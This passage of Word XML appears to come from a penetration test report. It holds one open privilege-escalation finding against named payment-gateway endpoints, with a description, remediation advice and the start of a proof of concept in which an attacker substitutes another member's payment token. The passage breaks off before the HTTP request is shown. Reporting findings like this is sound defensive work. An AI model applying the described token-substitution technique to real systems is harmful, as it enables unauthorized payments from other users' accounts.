    <w:p w14:paraId="671375C1" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70995543" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="622467A4" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4568D79C" w14:textId="2B3751D4" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00AD1435">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Toc10703668"/>
            <w:r>
              <w:t>H</w:t>
            </w:r>
            <w:r w:rsidR="00AD1435">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="60CE103A" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A8F4F7"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51CA8145" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:anchor="CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="000976CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>7.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7186776A" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C516AF1"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3A8092A4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-272: Least Privilege Violation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0C4FE86F" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA0158B"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2083C2" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00DB3557" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB3557">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/paymentgateway/gofundhip/secure/v1/gbd/payments/submittransaction</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266B724F" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>searchUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="030D0975" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getUserIdDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6E674F08" w14:textId="26308F4B" w:rsidR="00A82FF7" w:rsidRPr="00397EF0" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0872">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getChannelDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3B61245D" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7094ADFB"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lastRenderedPageBreak/>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="12E37737" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00DB3557" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The application allows users to access resources that they should not have permission to access. This is due to improper authorization of user requests. The application relies on the assumption that the user will request only those portions they are authorized to access, rather than validating and authenticating every user request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1459CF6E" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BCE425"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2189298C" w14:textId="77777777" w:rsidR="00DB3557" w:rsidRDefault="00DB3557" w:rsidP="00DB3557">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The application should perform server-side authorization for all requests. Do not assume that a request is permissible because the request comes from an authenticated user. It is also necessary to verify that the user making the request has the necessary privileges (is authorized) to make such a request. Unauthorized requests should be denied.  Do not rely on client-side values or code to decide which functionality is available to users; users can manipulate client-side data and functionality. Such functionality should be validated by querying a session object, database, or some other information that users cannot directly modify. Developers should treat client-supplied input as untrusted and not rely on presentation logic to provide higher-level privileges. Logic running on the server should be used to determine a user's role and present the appropriate browser screens. Hiding or disabling functionality solely within the user interface is not secure.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260BABFD" w14:textId="77777777" w:rsidR="00DB3557" w:rsidRDefault="00DB3557" w:rsidP="00DB3557">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D1D15E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00DB3557" w:rsidP="00DB3557">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B16DAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10 A7 – Missing Function Level Access Control</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidRPr="00B16DAF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1C267FD8" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="54775EFD"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0283FA50" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1D9C5C83" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C033E77" w14:textId="044B0DF5" w:rsidR="00F03F96" w:rsidRDefault="00AD0973" w:rsidP="00AD0973">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP requests and responses demonstrate an unauthorized user submitting payments for a non-associated member. </w:t>
            </w:r>
            <w:r w:rsidR="00AD5D28">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker is able to utilize another </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>member’s</w:t>
            </w:r>
            <w:r w:rsidR="00AD5D28">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> payment </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AD5D28">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tokenID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AD5D28">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, and append the </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attacker’s</w:t>
            </w:r>
            <w:r w:rsidR="00AD5D28">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> username to the account in order to complete this transaction.  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73802029" w14:textId="77777777" w:rsidR="00AD0973" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00AD0973">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00793DD6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155EC94C" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00AD0973">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The attacker has replaced the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tokenID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> field with another </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>user’s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> payment ID, and inserted their own username to bypass security checks. </w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
